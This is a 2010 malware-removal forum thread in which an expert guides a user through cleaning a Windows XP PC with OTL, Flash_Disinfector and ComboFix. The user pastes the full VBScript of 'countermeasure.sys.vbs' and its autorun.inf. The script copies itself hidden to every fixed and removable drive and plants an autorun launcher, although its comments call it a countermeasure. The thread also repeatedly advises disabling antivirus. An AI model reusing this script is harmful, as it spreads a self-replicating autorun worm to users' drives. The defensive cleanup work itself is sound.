από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 15 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.

Error - 8/2/2010 4:13:05 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452689
Description = Υπηρεσία Παροχής Χρόνου NtpClient: Παρουσιάστηκε ένα σφάλμα κατά την
αναζήτηση DNS του σταθμού 'time.windows.com,0x1' με μη αυτόματες ρυθμίσεις παραμέτρων.
Το NtpClient θα επιχειρήσει αναζήτηση DNS ξανά σε 15 λεπτά. Το σφάλμα ήταν: Επιχειρήθηκε
η εκτέλεση μιας λειτουργίας υποδοχής σε ένα κεντρικό υπολογιστή, ο οποίος δεν είναι
προσπελάσιμος. (0x80072751)

Error - 8/2/2010 4:13:05 μμ | Computer Name = HOME-VYXPNW9L30 | Source = W32Time | ID = 39452701
Description = Η υπηρεσία παροχής χρόνου NtpClient έχει ρυθμιστεί να λαμβάνει ώρα
από μία ή περισσότερες προελεύσεις χρόνου, ωστόσο αυτή τη στιγμή δεν είναι προσπελάσιμη
καμία
από αυτές. Δεν θα γίνει καμία προσπάθεια επικοινωνίας με κάποια προέλευση χρόνου
για 15 λεπτά. Ο NtpClient δεν έχει προέλευση ακριβούς ώρας.


< End of report >

I hope this'll help...

Edited by couber, 08 February 2010 - 02:24 PM.

  • 0

#4
RKinner

RKinner

    Malware Expert

  • Expert
  • 23,181 posts
  • MVP
OTL says you have autorun.inf files even if you can't see them.

O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - C:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () - D:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/08 16:55:38 | 000,000,118 | RHS- | M] () - I:\autorun.inf -- [ FAT32 ]
O32 - AutoRun File - [2010/02/07 18:22:28 | 000,000,000 | ---D | M] - I:\autorun -- [ FAT32 ]

and

[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\WINDOWS\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,004,944 | RHS- | M] () -- C:\countermeasure.sys.vbs
[2010/02/08 16:55:36 | 000,000,118 | RHS- | M] () -- C:\autorun.inf

Since the two vbs files were installed at the same time they are probably being called by the autorun. Would be interesting to see what they do:


Copy the text between the lines of stars by highlighting and Ctrl + c.

******************************************************************
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2" /f

**********************************************************************

Start, Run, cmd, OK to bring up a new Command Prompt window. Rightclick and select Paste and the above text should appear. Make sure you got it all and then hit Enter.

(Now let's see what the files are up to: )

cd \

(CD SPACE \ )

attrib -r -h -s autorun.inf

(attrib SPACE -r SPACE -h SPACE -s SPACE autorun.inf )

notepad autorun.inf

(notepad SPACE autorun.inf)

(Once you copy the text to a reply you can close notepad and then go back to the command window)

del autorun.inf

(del SPACE autorun.inf)

mkdir autorun.inf

(mkdir SPACE autorun.inf)

attrib -r -h -s countermeasure.sys.vbs

(attrib SPACE -r SPACE -h SPACE -s SPACE countermeasure.sys.vbs )

notepad countermeasure.sys.vbs

(notepad SPACE countermeasure.sys.vbs)

(Once you copy the text to a reply you can close notepad and then go back to the command window)

exit.

Download Flash_Disinfector.exe by sUBs
http://download.blee...Disinfector.exe
and save it to your desktop.

* Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
* The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
* Wait until it has finished scanning and then exit the program.
* Reboot your computer when done.


Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Download but do not yet run ComboFix
:!: If you have a previous version of Combofix.exe, delete it and download a fresh copy. :!:

:!: It must be saved to your desktop, do not run it :!:

:!: Disable your Antivirus software when downloading or running Combofix. If it has Script Blocking features, please disable these as well. See: http://www.bleepingc...opic114351.html


Download and Rename this file -- (call it george.exe ) to your Desktop -- from either of these two sources:
http://download.blee...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Doubleclick on george to start the program.



* :!: Important: Have no other programs running. Your Task Bar should be clear of any program entries including your Browser.


* A window may open with a series of Disclaimers. Accept the Disclaimers to start the fix. Allow it to install the Recovery Console then Continue. When the scan completes Notepad will open with with your results log open. Do a File, Exit and answer 'Yes' to save changes.


A caution - Do not run Combofix more than once. Do not touch your mouse/keyboard until the scan has completed, as this may cause the process to stall or your computer to lock. The scan will temporarily disable your desktop, and if interrupted may leave your desktop disabled. If this occurs, please reboot to restore the desktop. Even when ComboFix appears to be doing nothing, look at your Drive light. If it is flashing, Combofix is still at work.

A file will be created at => C:\Combofix.txt. I'll need to see that in your reply.

Re-activate your protection programs at this time :!:

Ron
  • 0

#5
couber

couber

    Member

  • Topic Starter
  • Member
  • PipPip
  • 29 posts
Hello and thanks for your time!!!

Here are the reports

Autorun.inf report:

[autorun]
shellexecute=wscript.exe countermeasure.sys.vbs

countermeasure.sys report


'-------------------------------------------------------------------------------------
'This is our countermeasure to the SolowD Worm-type virus.
'Created by ThinkDeep group to save TEI from this virus
'-------------------------------------------------------------------------------------

on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado

katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe countermeasure.sys.vbs"

set kfs = createobject("Scripting.FileSystemObject")
set kmf = kfs.getfile(Wscript.ScriptFullname)

dim text,size
size = kmf.size
check = kmf.drive.drivetype
set text = kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf

loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\countermeasure.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\countermeasure.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\countermeasure.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\countermeasure.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\countermeasure.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\countermeasure.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next

'--------------------------------------
'----------MUST BE DELETED-------------
set rgpath=createobject("WScript.Shell")
rgpath.DeleteKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.DeleteKey "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
'--------------------------------------
'--------------------------------------

if check <> 1 then
Wscript.sleep 200000
end if

loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

And finally combofix.txt

ComboFix 10-02-08.09 - Bougioukli Sofia 09/02/2010 19:04:09.1.2 - FAT32x86
Microsoft Windows XP Professional 5.1.2600.3.1253.30.1032.18.511.283 [GMT 2:00]
Running from: c:\documents and settings\Bougioukli Sofia\Επιφάνεια εργασίας\george.exe
AV: ESET Smart Security 3.0 *On-access scanning disabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
FW: ESET Personal firewall *enabled* {E5E70D32-0101-4340-86A3-A7B0F1C8FFE0}
* Resident AV is active

.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\Ινδιάνος .bmp
c:\windows\system32\winlogon.bak
D:\Autorun.inf
I:\Autorun.inf

.
((((((((((((((((((((((((( Files Created from 2010-01-09 to 2010-02-09 )))))))))))))))))))))))))))))))
.

2010-02-07 16:17 . 2006-07-22 21:49 5376 ------w- c:\windows\system32\antiwpa.dll
2010-02-07 16:14 . 2010-02-07 16:14 -------- d-sh--w- c:\documents and settings\Administrator\IETldCache
2010-02-07 14:12 . 2010-01-07 14:07 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2010-02-07 14:12 . 2010-02-07 14:12 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes
2010-02-07 14:12 . 2010-01-07 14:07 19160 ----a-w- c:\windows\system32\drivers\mbam.sys
2010-02-07 14:12 . 2010-02-07 14:12 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
2010-02-07 11:37 . 2010-02-07 11:37 -------- d-----w- c:\windows\system32\wbem\Repository
2010-01-26 17:29 . 2010-02-09 13:19 4944 --sha-r- c:\windows\countermeasure.sys.vbs
2010-01-26 17:29 . 2010-02-09 13:19 4944 ----a-w- C:\countermeasure.sys.vbs
2010-01-16 18:10 . 2010-01-16 18:10 -------- d-----w- c:\documents and settings\All Users\Application Data\Yahoo! Companion
2010-01-16 18:09 . 2010-01-16 18:09 -------- d-----w- c:\windows\SxsCaPendDel
2010-01-13 17:10 . 2010-01-13 17:10 -------- d-----w- c:\program files\Yahoo! Games
2010-01-10 19:51 . 2010-01-10 19:51 -------- d-----w- C:\FOUND.009

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-01-08 16:44 . 2010-01-08 16:44 -------- d-----w- c:\program files\CDisplay
2010-01-08 16:28 . 2010-01-08 16:28 -------- d-----w- c:\documents and settings\Bougioukli Sofia\Application Data\BSplayer
2010-01-08 14:23 . 2005-03-28 14:10 28232 ----a-w- c:\documents and settings\Bougioukli Sofia\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-12-21 19:06 . 2006-06-23 11:28 916480 ----a-w- c:\windows\system32\wininet.dll
2009-12-10 12:07 . 2002-09-30 10:00 94960 ----a-w- c:\windows\system32\perfc008.dat
2009-12-10 12:07 . 2002-09-30 10:00 550762 ----a-w- c:\windows\system32\perfh008.dat
2009-12-07 20:57 . 2009-12-07 20:57 1417353 ----a-w- c:\documents and settings\All Users\Application Data\NeoEdge Networks\Yahoo_NannyMania\IAF.dll
2009-11-21 15:54 . 2002-09-30 10:00 471552 ----a-w- c:\windows\AppPatch\AcLayers.dll
2009-11-21 14:38 . 2009-11-21 14:38 152576 ----a-w- c:\documents and settings\Bougioukli Sofia\Application Data\Sun\Java\jre1.6.0_17\lzma.dll
2009-11-21 14:38 . 2009-11-21 14:38 79488 ----a-w- c:\documents and settings\Bougioukli Sofia\Application Data\Sun\Java\jre1.6.0_17\gtapi.dll
2001-05-24 10:59 . 2008-11-23 10:49 162304 ----a-w- c:\program files\UNWISE.EXE
.

((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Messenger (Yahoo!)"="c:\progra~1\Yahoo!\MESSEN~1\YahooMessenger.exe" [2009-11-10 5244216]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE" [2003-10-08 57344]
"NeroFilterCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648]
"Easy-PrintToolBox"="c:\program files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE" [2004-01-14 409600]
"DAEMON Tools"="c:\program files\DAEMON Tools\daemon.exe" [2005-12-10 133016]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2007-10-19 286720]
"CARPService"="carpserv.exe" [2001-12-22 4608]
"egui"="c:\program files\ESET\ESET Smart Security\egui.exe" [2007-12-21 1443072]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2009-03-27 13684736]
"nwiz"="nwiz.exe" [2009-03-27 1657376]
"ISUSPM"="c:\program files\Common Files\InstallShield\UpdateService\isuspm.exe" [2006-05-16 213936]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2009-03-27 86016]
"MP10_EnsureFileVer"="c:\windows\inf\unregmp2.exe" [2008-04-14 212992]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-10-11 149280]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-12-21 35760]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2009-12-11 948672]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\System32\CTFMON.EXE" [2008-04-14 15360]

c:\documents and settings\Bougioukli Sofia\Start Menu\Ź¨¦š¨αŁŁ˜«˜\„΅΅ε¤ž©ž\
Webshots.lnk - c:\program files\Webshots\Launcher.exe [2006-2-13 45056]

c:\documents and settings\All Users\Start Menu\Ź¨¦š¨αŁŁ˜«˜\„΅΅ε¤ž©ž\
Microsoft Office.lnk - c:\program files\Microsoft Office\Office\OSA9.EXE [1999-2-17 65588]

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\Sony Ericsson\\Sony Ericsson Media Manager\\MediaManager.exe"=

R2 ekrn;Eset Service;c:\program files\ESET\ESET Smart Security\ekrn.exe [21/12/2007 8:21 πμ 468224]
S0 sptd;sptd;c:\windows\system32\drivers\sptd.sys [9/10/2006 2:34 μμ 642560]
S2 IKANLOADER2;General Purpose USB Driver (e4ldr.sys);c:\windows\system32\Drivers\e4ldr.sys --> c:\windows\system32\Drivers\e4ldr.sys [?]
S3 e4usbaw;USB ADSL2 WAN Adapter;c:\windows\system32\DRIVERS\e4usbaw.sys --> c:\windows\system32\DRIVERS\e4usbaw.sys [?]
S3 KTalk;KTalk;\??\c:\docume~1\BOUGIO~1\LOCALS~1\Temp\ktalk.sys --> c:\docume~1\BOUGIO~1\LOCALS~1\Temp\ktalk.sys [?]
.
Contents of the 'Scheduled Tasks' folder

2010-02-09 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2007-08-29 12:57]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.yahoo.com/
IE: Easy-WebPrint Add To Print List - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_AddToList.html
IE: Easy-WebPrint High Speed Print - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_HSPrint.html
IE: Easy-WebPrint Preview - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_Preview.html
IE: Easy-WebPrint Print - c:\program files\Canon\Easy-WebPrint\Resource.dll/RC_Print.html
IE: Ε&ξαγωγή στο Microsoft Excel - c:\progra~1\MICROS~2\Office10\EXCEL.EXE/3000
DPF: DirectAnimation Java Classes - file://c:\windows\Java\classes\dajava.cab
DPF: Microsoft XML Parser for Java - file://c:\windows\Java\classes\xmldso.cab
FF - ProfilePath - c:\documents and settings\Bougioukli Sofia\Application Data\Mozilla\Firefox\Profiles\fsnyug2o.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.yahoo.com
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

---- FIREFOX POLICIES ----
FF - user.js: yahoo.ytff.general.dontshowhpoffer - true.
- - - - ORPHANS REMOVED - - - -

HKLM-Run-NWEReboot - (no file)
AddRemove-{AC64B069-151A-4E5B-9274-DF7ABD779578} - H:\Uninstall.exe



**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-02-09 19:08
Windows 5.1.2600 Service Pack 3 FAT NTAPI

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\WPAEvents]
@Denied: (Full) (LocalSystem)
"OOBETimer"=hex:7f,63,3e,be,ec,25,8e,19,be,a7,92,c6
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(892)
c:\windows\system32\antiwpa.dll
.
Completion time: 2010-02-09 19:09:54
ComboFix-quarantined-files.txt 2010-02-09 17:09

Pre-Run: 3.381.379.072 διαθέσιμα byte
Post-Run: 3.349.135.360 διαθέσιμα byte

WindowsXP-KB310994-SP2-Pro-BootDisk-ENU.exe
[boot loader]
timeout=2
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
c:\cmdcons\BOOTSECT.DAT="Microsoft Windows Recovery Console" /cmdcons
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn

Current=1 Default=1 Failed=0 LastKnownGood=4 Sets=1,2,3,4
- - End Of File - - 87B4AA33BD05DB0E097DE09AEEB10670

Well, everything seems to be working right now. I hope this is over...

PS: I noticed that some new files were created on my C: drive(FOUND.001 etc) what are these???
  • 0

#6
RKinner

RKinner

    Malware Expert

  • Expert
  • 23,181 posts
  • MVP
The files you are seeing are created when you (or windows) does a disk check. They are recovered fragments of damaged or lost files. Not really a good sign since it may indicate your hard drive is getting tired and may fail in the near future. Good time to back up any important data you may have stored on it.

The vbs file did not appear to be malicious but I'm not an expert on vbs so can't be sure. You can try gmer again and see if it runs now. (Sometimes it helps if you turn off your antivirus before downloading and running it. Also try renaming it to gmr.exe) If it still won't run get root repeal from
http://rootrepeal.googlepages.com/ save it to your desktop and run it. Press the Scan button.
I think it creates a log if so I'd like to see it.

We need to clean up System Restore. Follow Jim's procedure here:
http://forum.aumha.o...581099691bf108f


I usually recommend a free BitDefender online scan as a final check to see if we missed anything. http://www.bitdefend...nline/free.html
It takes a while (hours) and you have to turn off your antivirus while you are running it but it is pretty thorough. It doesn't fix anything so if it finds something (that is not in Qoobox, or your antivirus's subfolders) you should save the log and post it in a reply.
If windows blocks the active x then try putting Bitdefender in your trusted sites: In IE, Tool, Internet Options, Security, Trusted Sites, Sites. Then uncheck the HTTPS box and put in *.bitdefender.com then ADD. OK.

If BitDefender comes back clean then you can uninstall or delete any tools we had you download and their logs. You can manually remove C:\george, C:\qoobox then put your system back the way it was (tho i would leave the hide extensions option unchecked.)


You do not have the latest Java. Get the latest (6.18 I think) at:

http://www.java.com/...nload/index.jsp


Once you install it, go into Control Panel, Add/Remove Software and remove any old versions (which may call themselves: Java Runtime, Runtime Environment, Runtime, JRE, Java Virtual Machine, Virtual Machine, Java VM, JVM, VM, J2RE, J2SE)
I see:
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}" = Java™ 6 Update 17
"{3248F0A8-6813-11D6-A77B-00B0D0160070}" = Java™ 6 Update 7

Also make sure you have the latest versions of any adobe.com products you use like Shockwave, Flash or Acrobat. Adobe is fond of foisting GetPlus on you. You can let them install it and then afterwards, go into Control Panel, Add/Remove Software and remove it. It probably doesn't hurt to leave it but I don't see the need for it and it has caused problems in the past.

Whether you use adobe reader, acrobat or fox-it to read pdf files you need to disable Javascript in the program. There is an exploit out there now that can use it to get on your PC. For Adobe Reader: Start, All Programs, Adobe Reader, Edit, Preferences, Click on Javascript in the left column and uncheck Enable Acrobat Javascript. OK Close program. It's the same for Foxit reader except you uncheck Enable Javascript Actions.

I recommend you install the free WinPatrol 2010 from http://www.winpatrol.com/download.html

It's a small program that will sit in your systray and warn you if something tries to make changes to your system.
  • 0

#7
couber

couber

    Member

  • Topic Starter
  • Member
  • PipPip
  • 29 posts
Thanks for replying. I will respond as soon as i try these, beacuse i don'y have much time these days. Thank you!!
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP